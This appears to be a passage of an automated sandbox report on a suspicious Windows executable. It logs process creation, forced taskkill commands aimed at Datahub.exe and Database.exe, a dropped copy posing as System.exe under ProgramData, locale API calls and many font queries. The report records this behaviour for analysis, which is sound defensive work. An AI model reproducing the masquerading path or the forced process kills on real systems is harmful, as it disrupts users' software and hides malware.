Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F

Source: pj31M24DLn.exe, 00000005.00000002.497978415.0000000001D80000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.500564958.0000000002300000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: pj31M24DLn.exe, 00000005.00000002.497978415.0000000001D80000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.500564958.0000000002300000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: pj31M24DLn.exe, 00000005.00000002.497978415.0000000001D80000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.500564958.0000000002300000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: pj31M24DLn.exe, 00000005.00000002.497978415.0000000001D80000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.500564958.0000000002300000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: pj31M24DLn.exe, 00000005.00000002.497978415.0000000001D80000.00000002.00000001.sdmp, System.exe, 0000002A.00000002.500564958.0000000002300000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetLocaleInfoW,	5_2_0043F238
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_0043F35E
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetLocaleInfoW,	5_2_0043F464
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetLocaleInfoW,	5_2_00435430
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_0043F533
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_2_0043EBD2
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetLocaleInfoW,	5_2_0043EDCD
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: EnumSystemLocalesW,	5_2_0043EE74
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: EnumSystemLocalesW,	5_2_0043EEBF
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: EnumSystemLocalesW,	5_2_0043EF5A
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: EnumSystemLocalesW,	5_2_00434F0E
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_0043EFE5
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetLocaleInfoW,	42_2_0043F238
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	42_2_0043F35E
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetLocaleInfoW,	42_2_0043F464
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetLocaleInfoW,	42_2_00435430
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	42_2_0043F533
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	42_2_0043EBD2
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetLocaleInfoW,	42_2_0043EDCD
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: EnumSystemLocalesW,	42_2_0043EE74
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: EnumSystemLocalesW,	42_2_0043EEBF
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: EnumSystemLocalesW,	42_2_0043EF5A
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: EnumSystemLocalesW,	42_2_00434F0E
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	42_2_0043EFE5

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Users\user\Desktop\pj31M24DLn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
